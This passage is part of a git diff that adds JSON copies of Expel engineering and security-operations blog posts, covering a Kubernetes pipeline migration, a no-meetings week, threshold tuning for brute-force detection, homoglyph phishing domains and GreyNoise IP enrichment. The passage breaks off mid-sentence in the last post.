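        "password": body["data"]["password"],
        "lease_id": body["lease_id"],
    }
```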
The plugin simply initiates the database connection using the new Go connector for CloudSQL instances and then delegates everything else to the community-supported Vault database plugin. How to use it Ok so you\u2019ve made it this far. You understand what problem the plugin is solving and how it\u2019s solving it. Now let\u2019s talk about how you use it. A step-by-step guide to building and deploying this plugin can be found here . Conclusion Although \u201cbuilding a new way\u201d often seems daunting, our journey with Vault and CloudSQL was rewarding and we hope our plugin will be useful to others facing similar issues. As we continue our journey, watch this space for future posts describing how to employ Vault as a database credential broker for workloads and audit across the stack. Finally, have a look: we\u2019ve posted a step-by-step guide on GitHub detailing how to set this up in your environment." +} \ No newline at end of file diff --git a/containerizing-key-pipeline-with-zero-downtime.json b/containerizing-key-pipeline-with-zero-downtime.json new file mode 100644 index 0000000000000000000000000000000000000000..c110e61c962293521ca7cdbd12dc6ff8743de8ac --- /dev/null +++ b/containerizing-key-pipeline-with-zero-downtime.json @@ -0,0 +1,6 @@ +{ + "title": "Containerizing key pipeline with zero downtime", + "url": "https://expel.com/blog/containerizing-key-pipeline-with-zero-downtime/", + "date": "Feb 23, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG Containerizing key pipeline with zero downtime Engineering \u00b7 8 MIN READ \u00b7 DAVID BLEWETT \u00b7 FEB 23, 2021 \u00b7 TAGS: Cloud security / MDR / Tech tools Running a 24\u00d77 managed detection and response (MDR) service means you don\u2019t have the luxury of scheduling downtime to upgrade or test pieces of critical infrastructure. If that doesn\u2019t sound challenging enough, we recently realized we needed to make some structural changes to one the most important components of our infrastructure \u2013 Expel\u2019s data pipeline, and the processing of that data pipeline. Our mission was to migrate from a virtual machine (VM)-based deployment to a container-based deployment. With zero downtime. Let\u2019s connect How did we pull it off? I\u2019m going to tell you in this blog post. (Hi, I\u2019m David, Expel\u2019s principal software engineer.) If you\u2019re interested in learning how to combine Kubernetes, feature flags and metric-driven deployments, keep reading. Background: Josie\u2122 and the Expel Workbench\u2122 In the past year at Expel, we\u2019ve migrated to Kubernetes as our core engineering platform (AKA the thing that enables us to run the Expel Workbench). What\u2019s the Expel Workbench? It\u2019s the platform we built so that our analysts can quickly get all the info they need about an alert and make quick decisions on what action to take next. In addition to some other very cool things. Want to see it in action? Get a free two-week trial of Expel Workbench for AWS Back to Kubernetes. While known for its complexity (who here likes YAML?), Kubernetes comes with a large amount of functionality that can, if used correctly, result in elegant solutions. Full disclosure: I\u2019m not going to dive into all the things we do with Kubernetes, or what is Kubernetes for that matter. Instead, I\u2019m going to focus specifically on our data pipeline and detection engine (we call her Josie). Our detection pipeline receives events (or logs) and alerts from our customer\u2019s devices and cloud environments. 
Then, our detection engine processes each alert and decides what to do with it. We have some fundamental beliefs about detection content and our pipeline: Never lose an alert; Quality and scale aren\u2019t mutually exclusive; The best ideas come from those closest to the problem; and Engineering builds frameworks for others to supply content. This means our detection pipeline is content-driven and can be updated by our SOC analysts here at Expel. We also hold the opinion that content should never take a framework down. If it does, that\u2019s on engineering, not the content authors. With these beliefs in mind, we were faced with the challenge of making structural changes to how we are running our detection engine, ensuring quality, not losing alerts and still enabling analysts to drive the content. Josie\u2019s journey to Kubernetes What we knew Ensuring this migration didn\u2019t disrupt the daily workflow of the SOC was key. Just as important was not polluting metrics used for tracking the performance of the SOC. That\u2019s why we wanted an iterative process. We wanted to run both pipelines in parallel and compare all the performance metrics and output to ensure parity. We also knew we wanted to be able to dynamically route traffic between pipelines, without the need for code-level changes requiring a build and deploy cycle. This would allow us to atomically re-route and have that change effective as quickly as possible. The final requirement was to retain the automated delivery of rule content. While the existing mechanism was error-prone, we didn\u2019t want to take a step backward here. Tech we chose We were already moving our production infrastructure to Kubernetes. So we took full advantage of several primitives in Kubernetes, including Deployments , ConfigMaps and controllers . We chose LaunchDarkly as a feature flag platform to solve both the testing in production and routing requirements. Their user interface (UI) is the icing on the cake \u2013 tracking changes in feature flag configuration as well as tracking flag usage over time. The real-time messaging built into their software development kit (SDK) enabled us to propagate flag changes on the order of hundreds of milliseconds. Preparing Josie for her journey If you\u2019ve read our other blogs, you\u2019ll know that Expel is data-driven when it comes to decision making. We rely on dashboards and monitors in DataDog to keep track of what\u2019s happening in our running systems on a real-time basis. Introducing a parallel pipeline carries the risk of polluting dashboards by artificially inflating counts. To mitigate this, we added tags to our custom metrics in DataDog . After the new tag was populated by the existing pipeline, we added a simple template variable , defaulting to filter to the current rule engine. This ensured that existing users\u2019 view of the world was scoped to the original engine. It also enabled the team to compare performance between the parallel pipelines in a very granular way. We then updated monitors to include the new tag, so they alerted separately from the old engine. The next step was to add gates to the application that would allow us to dynamically shift traffic between rule engines. To do this, we created two feature flags in LaunchDarkly: one to control data that is allowed into a rule engine and one to control what is output by each engine. Finally, we set up a custom targeting rule that considered the customer and the rule engine name. 
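As a rough illustration of those two gates, here's what the checks might look like with the LaunchDarkly Python SDK (shown with the older user-dictionary style; newer SDK versions use contexts instead). The flag keys and custom attribute names are hypothetical, since the real targeting rules aren't spelled out in the post.

```python
# Sketch of the two LaunchDarkly gates described above: one controlling
# whether this engine instance processes an incoming event (ingress) and one
# controlling whether it publishes results back to Workbench (egress).
# Flag keys and attribute names are illustrative.
import ldclient
from ldclient.config import Config

ldclient.set_config(Config("your-sdk-key"))   # placeholder SDK key
flags = ldclient.get()


def gates_for(customer_id: str, engine_name: str):
    target = {"key": customer_id, "custom": {"rule_engine": engine_name}}
    # Gate 1: should this engine instance process the incoming event at all?
    ingress = flags.variation("rule-engine-ingress", target, False)
    # Gate 2: should this engine publish its results back to Workbench?
    egress = flags.variation("rule-engine-egress", target, False)
    return ingress, egress


# Example: only consume the event if ingress is on; only publish if egress is on.
allow_in, allow_out = gates_for("customer-123", "kubernetes")
```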
Initial: Kubernetes Once the instrumentation and feature flags were functional, we began setting up the necessary building blocks in Kubernetes. When setting up pipelines, I try to get all the pieces connected first and then iterate through the process of adding the necessary functionality. So, we set up a Deployment in Kubernetes. A Deployment encapsulates all of the necessary configuration to run a container. To simplify the initial setup, we had the application connect to the Detections API service on startup to retrieve detection content. This microservice abstracts our detection-content-as-code, giving programmatic access to the current tip of the main branch of development. Note that we configured the LaunchDarkly feature flags before turning on the deployment. The first flag controlled whether or not this instance of the detection engine would process an incoming event from Kafka. This flag allowed us to start with a trickle of data in the new environment, and gradually ramp up the volume to test processing load in Kubernetes. The second flag controlled whether this version of Josie would publish the results of the analysts\u2019 rules to the Expel Workbench. This allowed us to work through potential issues encountered while getting the application to function in the new environment, without fear of breaking the live pipeline and polluting analyst workflow. You can see the diagram I created to help visualize the workflow below. LaunchDarkly feature flags control flow Load Testing Once the new Deployment was functional inside Kubernetes, we began a round of load testing. This was critical to understand the base performance differences between the execution environments. We performed the load testing by first enabling ingress for all data into the new detection engine, but kept egress turned off. We then rewound the application\u2019s offset in Kafka. The data arrived in the rule engine and performed processing, but any output would be dropped on the floor. The processing generated the same level of metric data that the live system did, so we could compare key metrics such as overall evaluation time, CPU usage and memory usage. LaunchDarkly feature flags control flow Output Validation While we iterated through the load test, we also tested the data that was output by the new system. We pulled this off by tweaking the feature flag targeting rule to allow egress for the new detection engine for a specific customer. We chose an internal customer so that we could see the output in the Expel Workbench, but not disrupt our analysts. We triggered alerts for this customer then checked to see if each alert was duplicated, and if the content of each duplicated alert was identical. LaunchDarkly feature flags control flow Rule Delivery Once we were sure the new execution environment was capable of processing the load as well as generating the same output, we began to tackle the thorny problem of how to deliver the rule content. At Expel, our belief in infrastructure-as-code extends to the rules our SOC analysts write to detect malicious activity. The detection content is managed in GitHub, where changes go through a pull request and review cycle. Each detection has unit tests that run through CircleCI on every commit. Getting detection content from GitHub to the execution environment is tricky. The body of rules is constantly changing, and the running rule engine needs to respond to those changes as quickly as possible. 
Previously, when a pull request was merged, delivering the updated rule content involved kicking off an Ansible job that would perform a series of operations in the VM, and then restart processes to pick up the change. The entire process from pull request merge to going live could take as long as 15 minutes. Not only that, there wasn\u2019t much visibility into when those operations failed. That\u2019s when we asked: Could Kubernetes help us improve this process? The team wasn\u2019t happy with the direct network connection on startup behavior, mainly because it introduced a point of failure and rule changes weren\u2019t captured after startup. After talking with our site reliability engineering (SRE) team, we decided that the Detections API should store a copy of the rule\u2019s content in a Kubernetes configmap. We then updated the Kubernetes Deployment to read the ConfigMap contents on startup. This decoupled the application from the network so that service failures in Detections API would not break the rule engine. But this introduced the possibility of a few other failure modes. If the saved rule content was not getting updated correctly, the running engine could be stuck running stale versions of the rule definitions. One possible cause of this is the size limit on ConfigMaps. Fortunately, addressing these possible failure modes was fairly straight forward. We used monitors in DataDog. We made use of a reloader controller to react to changes in the ConfigMap. This controller listens for changes in the ConfigMap and triggers an update to the Deployment. When Kubernetes sees this change in the Deployment, it initiates a rolling update . This process ensures that the new pods start successfully, then spins down the old pods. With both of these changes in place, we arrived at a solution that simplified the operation of the system and allowed it to react to changes in rule content faster than the original implementation. Below is a diagram of the entire process. Expel containerized rule engine Live Migration With the new Deployment performing well and responding to rule changes, we were ready to shift live processing from the old system to the new. We decided to do a phased rollout. We started with a small subset of our customer base, turning egress off in the old implementation and on in the new. We allowed the system to run for a couple of days, and then slowly increased the number of customers routing to the new system. After a few more days, we shifted all customer egress to the new pipeline and turned off egress on the old one. We kept the old system running in parallel so that if we encountered any discrepancies or problems, we could easily flip back to it. After letting both run in parallel for a week, we decommissioned the legacy VM system. LaunchDarkly feature flags control flow What this means for developers Large-scale change to a critical business component is a daunting task. Throughout the process, we made sure to keep both the SOC and leadership in the loop. You\u2019ve probably seen us mention the importance of communication a few times. Regular communication during each phase, especially the planning phases, was critical. We needed to learn about the key dashboards and monitors in play. This also helped us mitigate the risk of having to answer to an angry SOC. Here are some tips based the lessons we learned along the way: LaunchDarkly provides a rich set of feature flags. 
While it provides a richer feature set than what we took advantage of, we were able to deploy code live but control execution at a very granular level through the use of feature flags. Our main goal here was to know in advance which subset of customers would be processed by which engine so that their associated engagement managers could be prepared for questions. Adopt observability. Our investment in being driven by metrics paid dividends here. The existing DataDog dashboards were comprehensive and we easily compared both systems simultaneously. We also leveraged the existing corpus of monitors by adjusting their targets to take an additional label into account. Don\u2019t overlook the primitives available in Kubernetes. They gave us the flexibility to respond to content changes at a much faster pace, and with greater visibility. While Kubernetes does support live reloading of configmap content, the current iteration of the engine doesn\u2019t take advantage of it. Our plan was to dynamically reload rule content in the running pod, instead of restarting on change. This alleviated hot-spots around waiting for Kafka partition ownership to settle, further decreasing the time it took for detection content to go live. I hope that this post helped give you some ideas and maybe even saved you some time problem solving. Want to play around with some of the things we\u2019ve built? Check out the Expel Workbench\u2122 for AWS ." +} \ No newline at end of file diff --git a/could-you-go-a-week-without-meetings-at-work.json b/could-you-go-a-week-without-meetings-at-work.json new file mode 100644 index 0000000000000000000000000000000000000000..74a8ddc4088bb01ebd0762b09e90426db147b312 --- /dev/null +++ b/could-you-go-a-week-without-meetings-at-work.json @@ -0,0 +1,6 @@ +{ + "title": "Could you go a week without meetings at work?", + "url": "https://expel.com/blog/week-without-meetings/", + "date": "Dec 8, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG Could you go a week without meetings at work? Talent \u00b7 3 MIN READ \u00b7 LAURA KOEHNE \u00b7 DEC 8, 2020 \u00b7 TAGS: Company news / Employee retention / Guide Wait\u2026what!? If you felt your stomach tighten in horror, followed quickly by a thrill up your spine at the idea of a whole week without meetings, you\u2019re not alone. Many Expletives felt the same as we prepared for our first Week Without Meetings in September. Eliminating all internal meetings for a week is a bold move, one designed to shock the system and make us more intentional about our meeting choices. The experiment paid off by increasing flexibility, and giving us the space and energy we needed. Want to try this at your company? Here are some lessons learned at Expel and tips for how your company can do it too. Why a week without meetings First, why\u2019d we do it? As school started, we\u2019d heard from parents and caregivers that what was needed most was flexibility to do work at a time when they personally had fewer distractions, along with fewer meetings. And we generally agreed that meeting-stuffed days, with hours on Zoom, were draining and left little time for individuals to do work and, even more important, work on strategic projects. We wanted to change Expel\u2019s meeting culture: Reducing the number of meetings (yes!) while improving the value of remaining meetings and encouraging more asynchronous collaboration. Pro tip: Before scheduling a week without meetings, define specific objectives for your program. It\u2019s not enough to just stop meeting for a week. 
You\u2019ll want to use the pause created by this event to support long-term behavior changes that meet your objectives. Expel focused on these behaviors: Being intentional about the decision to have a meeting Making the meetings we do have more productive Using asynchronous collaboration to work together more flexibly Getting feedback on our meetings for continuous improvement Here\u2019s a quick decision tree we created to help employees decide whether or not they needed to schedule a meeting: Meeting decision tree adapted from Real Life E Time Coaching and Training But why actually stop meetings? Eliminating all internal meetings for the whole week may seem drastic, but sometimes when you\u2019re after urgent, collective behavior change you need a big gesture. We wanted to catch attention immediately, to build awareness and have all Expletives experience the positive benefits of having fewer meetings first-hand, together. Plus, we couldn\u2019t very well schedule a meeting to talk about reducing meetings, could we? (Although, to be honest, those of us planning it met a lot while working out the details\u2026go figure!) How did you pull it off? A Week Without Meetings gave us the \u201cloud pause\u201d we needed to slow down and become more selective about our meeting habits. Here are the steps we took at Expel to prepare our people for a week without meetings (you can use these tips, too): Give several weeks advance notice so people can reorganize their schedules. Provide clear guidance and explicit permission for making decisions about which meetings to schedule and accept. (Our goal was to eliminate all internal meetings. Some meetings stayed: customers, of course, and a few managers met with job candidates or onboarded new hires. The point is to discern what can only be done in a meeting.) No meetings doesn\u2019t mean no work. Depending on what you\u2019re trying to do, there are plenty of ways to collaborate outside of meetings . Help your team use the tools available to them. Help managers prepare their teams for Week Without Meetings. Discuss strategies for communicating and maintaining forward momentum for the week. Is that all? Remember, the week itself is part of a behavior change initiative that started before the big event, and continues to this day. Some other keys to our success include giving every Expel manager a chance to weigh in on the idea before it launched; preparing managers with talking points and tools to use with their teams; providing all Expletives with learning resources to support the changes (see a selection on sidebar) and continued reinforcement of key concepts by executives who share their \u201cmeeting mojo\u201d with our company weekly. Would you do it again? Absolutely! In our first Week Without Meetings, many Expletives reported a noticeable increase in energy because they had more time to focus on getting work done. Interestingly, a good number said they became more engaged in their work. Overall we found the experience so beneficial, Expel just completed a second Week Without Meetings in November and plans to continue this tradition quarterly. Here are some key themes from the feedback in September: Week Without Meetings impact If you\u2019re going to implement your own Week Without Meetings, have a mechanism for gathering feedback asynchronously during that time. Share it at the start of the week and encourage people to post observations and ideas as they have them. 
Expel uses a \u201chotwash\u201d document that asks what\u2019s going well, \u201cmeh\u201d and badly. Derived from the hotwash, the bubbles above are keyed like a stoplight (green = good) and the size indicates the relative volume of comments by theme. A final word If an idea brings up a knee-jerk \u201cNo way!\u201d follow it up with a \u201cWhy not?\u201d Without that approach, Expel\u2019s Week Without Meetings wouldn\u2019t have made it off the drawing board. Go ahead. Ask \u201cWhy not?\u201d and see what happens when you ditch meetings for a week. We can\u2019t wait to hear how it goes. If you try it, send us a note \u2013 we want to hear about your experience ." +} \ No newline at end of file diff --git a/creating-data-driven-detections-with-datadog-and.json b/creating-data-driven-detections-with-datadog-and.json new file mode 100644 index 0000000000000000000000000000000000000000..a19b0cd6224769eb5fe31b0e18afd864f209d4c2 --- /dev/null +++ b/creating-data-driven-detections-with-datadog-and.json @@ -0,0 +1,6 @@ +{ + "title": "Creating data-driven detections with DataDog and ...", + "url": "https://expel.com/blog/creating-data-driven-detections-datadog-jupyterhub/", + "date": "Feb 11, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG Creating data-driven detections with DataDog and JupyterHub Security operations \u00b7 5 MIN READ \u00b7 DAN WHALEN \u00b7 FEB 11, 2020 \u00b7 TAGS: Get technical / How to / SOC / Tools Ask a SOC analyst whether brute forcing alerts bring them joy and I\u2019ll bet you\u2019ll get a universal and emphatic \u201cno.\u201d If you pull on that thread, you\u2019ll likely hear things like \u201cThey\u2019re always false positives,\u201d \u201cWe get way too many of them\u201d and \u201cThey never actually result in any action.\u201d So what\u2019s the point? Should we bother looking at these kinds of alerts at all? Well, as it often turns out when you work in information security \u2026 it\u2019s complicated. Although detections for brute forcing, password spraying or anything based on a threshold are created with good intentions, there\u2019s always a common challenge: What\u2019s the right number to use as that threshold? More often than we\u2019d like to admit, we resort to hand waving and \u201cfollowing our gut\u201d to decide. The \u201cright\u201d threshold is hard to determine and as a result we end up becoming overly sensitive, or worse, our threshold is so high that it causes false negatives (which isn\u2019t a good look when a real attack occurs). At Expel, we\u2019ve been working since day one to achieve balance: ensuring we have the visibility we need into our customers\u2019 environments without annoying our analysts with useless alerts. How data and tooling can help As it turns out, security and DevOps challenges have quite a bit in common. For example, how many 500 errors should it take to page the on-call engineer? This is similar to a security use case like password spraying detection. These shared problems mean we can use a suite of tools that are shared between security and DevOps to help tackle security problems. Some of our go-to tools include: DataDog , which captures application metrics that are used for baselining and alerting; and JupyterHub , which provides a central place for us to create and share Jupyter Notebooks.
Step 1: Gather the right data To arrive at detection thresholds that work for each customer (by the way, every customer is different \u2026 there\u2019s no \u201cone size fits all\u201d threshold), we need to collect the right data. To do this, we started sending metrics to DataDog reflecting how our threshold-based rules performed over time. This lets us monitor and adjust thresholds based on what\u2019s normal for each customer. For example, as our detection rule for password spraying processes events, it records metrics that include: Threshold Value , which is the value of the threshold at the time the event was processed; and Actual Value , which is how close we were to hitting the threshold when the event was processed. By charting these metrics, we can plot the performance of this detection over time to see how often we\u2019re exceeding the threshold and if there\u2019s an opportunity to fine tune (increase or decrease it): This data is already useful \u2013 it allows us to visualize whether a threshold is \u201cright\u201d or not based on historical data. However, doing this analysis for all thresholds (and customers) would require lots of manual work. That\u2019s where JupyterHub comes in. Step 2: Drive change with data Sure, we could build DataDog dashboards and manually review and update thresholds based on this data in our platform but there\u2019s still room to make this process easier and more intuitive. We want to democratize this data and enable our service delivery team (made up of SOC analysts, as well as our engagement management team) to make informed decisions without requiring DataDog-fu. Additionally, it should be easy for our engagement management team to discuss this data with our customers. This is exactly why we turned to JupyterHub \u2014 more specifically, Jupyter Notebooks. We\u2019ve talked all about how we use JupyterHub before , and this is another great use case for a notebook. We created a Jupyter Notebook that streamlined threshold analysis and tuning by: Querying DataDog metrics and plotting performance; Allowing the simulation of a new threshold value; and Recommending threshold updates automatically. As an example, a user can review a threshold like below, simulate a new threshold and decide on a new value that\u2019s informed by real-world data for that customer. This lets us have more transparent conversations with our customers about how our detection process works and is a great jumping off point to discuss how we can collaboratively fine tune our strategy. Additionally, we added a feature to automatically review historical performance data for all thresholds and recommend review for thresholds that appear to be too high or too low. There\u2019s room for improvement here but we\u2019ve already had luck with simply looking at how many standard deviations off we are from the threshold value on average. For example, here\u2019s what a threshold that is set way too high looks like: By automating data gathering and providing a user interface, we enabled our service delivery team to review and fine tune thresholds. JupyterHub was key to our success by allowing us to quickly build an intuitive interface and easily share it across the team. Step 3: Correlate with additional signals Arriving at the right threshold for the detection use case is one important part of the puzzle, but that doesn\u2019t completely eliminate the SOC pain. Correlation takes you that last (very important) mile to alerts that mean something.
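Before we get to correlation, here\u2019s a rough sketch (in Python) of the standard-deviation check described in Step 2. To be clear, this isn\u2019t the notebook code itself: it assumes the historical \u201cActual Value\u201d samples have already been pulled out of DataDog into a plain list, and the cutoffs are purely illustrative.

from statistics import mean, stdev

def review_threshold(actual_values, threshold, too_high_z=3.0, too_low_z=1.0):
    # actual_values: historical 'Actual Value' samples for one customer's rule
    # threshold: the currently configured 'Threshold Value'
    avg = mean(actual_values)
    spread = stdev(actual_values) or 1.0  # avoid dividing by zero on flat data
    z = (threshold - avg) / spread  # distance from normal behavior, in standard deviations
    if z > too_high_z:
        return 'threshold looks too high; consider lowering it'
    if z < too_low_z:
        return 'threshold sits inside normal activity; expect noisy alerts'
    return 'threshold looks reasonable'

# A threshold of 50 against single-digit daily failure counts screams 'too high':
print(review_threshold([3, 5, 4, 6, 2, 4], threshold=50))

With thresholds grounded in data like that, correlation is what squeezes out the remaining noise.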
For example, we can improve the usefulness of brute force and password spraying alerting by correlating that data with additional signals like: Successful logins from the same IP , which may indicate a compromised account that needs to be remediated; Account lockouts from the same IP , which can cause business disruption; and Enrichment data from services like GreyNoise , that help you determine whether this is an internet-wide scan or something just targeted at your org. By focusing on the risks in play and correlating signals to identify when those risks are actually being realized, you\u2019ll significantly reduce noisy alerts. Every detection use case is a bit different, but we\u2019ve found that this is generally a repeatable exercise. Putting detection data to work Detection data \u2014 in particular, knowing what true negatives and true positives look like \u2014 gives us the capability to more effectively research and experiment with different ways to identify malicious activity. One example of this comes from our data science team. They\u2019ve been looking into ways to avoid threshold-based detection to identify authentication anomalies. The example you see below shows how they used seasonal trends in security signals for a particular customer to identify potential authentication anomalies. By using that seasonal decomposition combined with the ESD (Extreme Studentized Deviate) test to look for extreme values, we can identify anomalous behavior that goes beyond the usual repetitive patterns we typically see. Thanks to these insights, we can automatically adjust our anomaly thresholds to account for those seasonal anomalies. We\u2019re lucky to have tools like DataDog and JupyterHub at our disposal at Expel, but improving detections is still possible without them. If you haven\u2019t yet invested in new tools, or are just getting started on continuously improving your detections, ask the following questions of the team and tools you already have: What does \u201cnormal\u201d look like in my environment? (ex: 10 failures per day) When is action required? (ex: when an account is locked) What other signals can we correlate with? (ex: login success) How many true positive versus false positive alerts are we seeing? Questions like these give you the ability to reason about detection in terms of your environment and its unique risks. Regardless of where the answers come from, this feedback loop is important to manage your signal-to-noise ratio and keep your analysts happy. Big thanks to Elisabeth Weber for contributing her data science genius to this post!" +} \ No newline at end of file diff --git a/customer-context-beware-the-homoglyph.json b/customer-context-beware-the-homoglyph.json new file mode 100644 index 0000000000000000000000000000000000000000..1c011dcfc3c3b0e17bfb7d3734190e83bc206aa2 --- /dev/null +++ b/customer-context-beware-the-homoglyph.json @@ -0,0 +1,6 @@ +{ + "title": "Customer context: beware the homoglyph", + "url": "https://expel.com/blog/customer-context-beware-the-homoglyph/", + "date": "1 day ago", + "contents": "Subscribe \u00d7 EXPEL BLOG Customer context: beware the homoglyph Security operations \u00b7 3 MIN READ \u00b7 PAUL LAWRENCE AND ROGER STUDNER \u00b7 MAY 16, 2023 \u00b7 TAGS: MDR This type of phishing attack can be ridiculously sneaky We love when our customers run red team engagements. 
Aside from testing and validating current security controls, detections, and response capabilities, we see it as a great opportunity to partner with our customers on areas of improvement. Here\u2019s the story of how a red team helped Expel improve our phishing service and how we used our platform capabilities to detect some sneaky activity. So, what happened? Our client\u2014let\u2019s call them Acme Corp\u2014had an enterprising red teamer with a clever idea. For one of their exercises, the red team purchased a domain: \u1ea1cmehome[.]com. Notice anything odd? Let\u2019s look closer: \u1ea1cmehome[.]com vs acmehome[.]com If you missed it, don\u2019t feel bad. That\u2019s the point. A bit of background The problem is that the \u201ca\u201d isn\u2019t an \u201ca\u201d at all, but an \u201c\u1ea1.\u201d It\u2019s a homoglyph \u2014\u201done of two or more graphemes, characters, or glyphs with shapes that appear identical or very similar but may have differing meaning.\u201d This one specifically is a Vietnamese particle used \u201cat the end of the sentence to express respect.\u201d Fast Company called homoglyph attacks (aka homography or Punycode attacks) one of the four most intriguing cyberattacks of 2022 . [They\u2019re] a type of phishing scam where adversaries create fake domain names that look like legitimate names by abusing International Domain Names that contain one or more non-ASCII characters. In other words, hackers discovered at some point that a lot of alphabets, like the Cyrillic and Russian alphabets, have characters that look like English or what we call Latin English. So, a Cyrillic \u201ca\u201d will be different from a Latin English \u201ca,\u201d but when these characters are used in domain names, they are indistinguishable to the naked eye. This allows phishers to spoof brand names and create look-alike domains which can be displayed in browser address bars if IDN display is enabled. There are lots of homoglyphs and the potential for mischief is off the hook (which is why top-level domain registries and browser designers are exploring ways to minimize the risks of h\u00f5m\u00f2gI\u00ffph\u00ec\u010d ch\u00e4\u00f4s). There\u2019s even a homoglyph \u201cattack ge\u00f1erator.\u201d This app is meant to make it easier to generate homographs based on homoglyphs than having to search for a look-a-like character in Unicode, then copying and pasting. Please use only for legitimate pen-test purposes and user awareness training. [emphasis added] Back to Acme. The red team\u2019s fake domain used the Vietnamese homoglyph to trick users into thinking it\u2019s the actual domain\u2014in this case, acmehome[.]com\u2014when that itty-bitty dot under the \u201ca\u201d makes a huge difference. The tactic also relies on a security operations center (SOC) analyst who\u2019s been staring at mind-numbing alerts slipping up and not noticing the difference in domain names. In truth, for most SOCs and attackers, this isn\u2019t a bad strategy. What we did After meeting with the red teamers, we uncovered a need to better scrutinize unique domains within emails that could intentionally trick the naked eye. Technology to the rescue. Since we have a content-driven platform capability\u2014customer context (CCTX)\u2014Expel was easily able to change the platform behavior to recognize the attack for that homoglyph site in Acme\u2019s Workbench\u2122. 
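To make the idea concrete, here\u2019s a minimal Python sketch of one way to catch this kind of look-alike (an illustration, not the CCTX implementation): strip the accents and combining marks from a domain and compare what\u2019s left against domains you actually own.

import unicodedata

def skeleton(domain):
    # NFKD splits accented characters into a base letter plus combining marks,
    # so '\u1ea1cmehome.com' decomposes into 'a' + a combining dot + 'cmehome.com'.
    decomposed = unicodedata.normalize('NFKD', domain.lower())
    return ''.join(ch for ch in decomposed if not unicodedata.combining(ch))

def looks_like_spoof(domain, owned_domains):
    return domain not in owned_domains and skeleton(domain) in owned_domains

print(looks_like_spoof('\u1ea1cmehome.com', {'acmehome.com'}))  # True

Accent-stripping only goes so far, though: a Cyrillic \u201c\u0430\u201d doesn\u2019t decompose into a Latin \u201ca,\u201d so a fuller approach needs a confusables table (Unicode publishes one) or a curated allow list.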
Having a platform that\u2019s content-driven means Expel users can change how the platform operates without having to engage with engineering teams to release new features. NOTE: When you have a platform that allows users to drive content and configuration, it means that once you understand how a feature works, you can bring your own creativity to solving problems. It\u2019s really fun when you\u2019re able to adapt a feature (especially if it allows for rapid response to new or emerging techniques) to accomplish something unanticipated during the design of the feature\u2014which is what happened in this case. The result? Acme Corp\u2019s red team conducted a similar attack again, and this time the SOC caught it with CCTX. What does it all mean? Multiple things, possibly. First, homoglyphs represent a technique that SOCs need to account for. Second, there are branding reasons (as well as security ones) to sort out homoglyph usage. While many businesses have accents and other homoglyphs in their names (Soci\u00e9t\u00e9 G\u00e9n\u00e9rale, A.P. M\u00f8ller-M\u00e6rsk, and Nestl\u00e9 come to mind), they typically use unaccented letters in their URLs. Would an analyst notice if a phishing attack used the homoglyph? Or, if the accented URL works (for example, lor\u00e9al.com), what if hackers put a different accent into play (\u00e8 vs \u00e9)? Third, this potentially matters even more for companies in nations whose languages employ extended iconography (this includes most non-English-speaking countries). Which means it matters more for cybersecurity firms serving them. Like us. Short version: homoglyph attacks are prevalent and sneaky. They pose particular challenges for human analysts, but as our Acme Corp case demonstrates, the combination of well-placed automation and humans leads to great results. If you have questions, or think your organization might be at risk, drop us a line ." +} \ No newline at end of file diff --git a/cutting-through-the-noise-riot-enrichment-drives-soc.json b/cutting-through-the-noise-riot-enrichment-drives-soc.json new file mode 100644 index 0000000000000000000000000000000000000000..1cc74f68eb1dcba8bd62e272fc7b9a788097241a --- /dev/null +++ b/cutting-through-the-noise-riot-enrichment-drives-soc.json @@ -0,0 +1,6 @@ +{ + "title": "Cutting Through the Noise: RIOT Enrichment Drives SOC ...", + "url": "https://expel.com/blog/cutting-through-the-noise/", + "date": "Jul 15, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Cutting Through the Noise: RIOT Enrichment Drives SOC Clarity Security operations \u00b7 2 MIN READ \u00b7 EVAN REICHARD AND IAN COOPER \u00b7 JUL 15, 2022 \u00b7 TAGS: MDR / Tech tools Flash back to your days in the SOC. An alert shows up and your investigative habits kick in ( OSCAR , anyone?). It takes a few minutes, but you eventually determine that this alert is benign network traffic and not, in fact, command and control (c2) traffic to attacker-controlled infrastructure. Can you remember what information you used to reach that conclusion? (Of course not, but maybe remembering a particular third-party open source intelligence (OSINT) tool or query is enough to generate a sense of nostalgia for you.) At Expel, we arm our analysts with the best OSINT available to quickly and accurately spot benign or false positive alerts. This creates space to tackle suspicious activity head-on. More signal. Less noise. Enter the Greynoise RIOT (Rule It Out) API.
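(If you want to kick the tires yourself, a lookup is a single HTTP call. The endpoint and response fields in this Python sketch are assumptions based on GreyNoise\u2019s public docs, so check the current API reference before relying on them.)

import requests

def riot_lookup(ip, api_key):
    # Assumed endpoint: GET https://api.greynoise.io/v2/riot/{ip}
    resp = requests.get(
        'https://api.greynoise.io/v2/riot/' + ip,
        headers={'key': api_key, 'Accept': 'application/json'},
        timeout=10,
    )
    resp.raise_for_status()
    data = resp.json()
    # 'riot' is expected to be true when the IP belongs to a known business service;
    # 'name', 'category' and 'trust_level' describe which one and how much to trust it.
    return {k: data.get(k) for k in ('riot', 'name', 'category', 'trust_level')}

# riot_lookup('8.8.8.8', 'YOUR-GREYNOISE-KEY')  # hypothetical key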
Greynoise RIOT API To paraphrase the Greynoise team, RIOT adds context to IPs observed in network traffic between common business applications like Microsoft Office 365, Google Workspace, and Slack or services like CDNs (content delivery networks) and public DNS (domain name system) servers. These business applications often use unpublished or dynamic IPs, making it difficult for security teams to keep track of expected IP ranges. Without context, this benign network traffic can distract the SOC from investigating higher priority security signals. We use the RIOT API, plus several other enrichment sources, to help our analysts quickly recognize IPs associated with business services and dispatch network security alerts that don\u2019t require further investigation. Ruxie\u2122, our ever-inquisitive security bot, uses these APIs to collect enrichment information and parse the results for human consumption. RIOT Destination IP Summary RIOT info guides analysts as they orient themselves with alerts. A color-coded enrichment workflow helps them identify noteworthy details. For example, RIOT recognizes the above IP as trust level 2 , but it\u2019s classified as a CDN. Attackers can use a CDN to obfuscate their true source via domain fronting. IPs tagged as trust level 1 are more likely to be associated with an IP that\u2019s managed by a business or service, rather than a CDN. \ufeff CSI: Cyber \u2013 \u201cAll I got is green code\u201d Ruxie also enriches other pieces of network evidence, like domains. Analysts can immediately see the date a domain was registered: a recently registered domain should be treated with additional scrutiny since they\u2019re often associated with recently built attacker infrastructure. Malicious domains tend to be promptly taken down, forcing attackers to start over from scratch. More advanced attackers are known to buy and hold useful domain names for extended periods prior to an attack. RIOT arms our analysts with a simple, colorized tool for 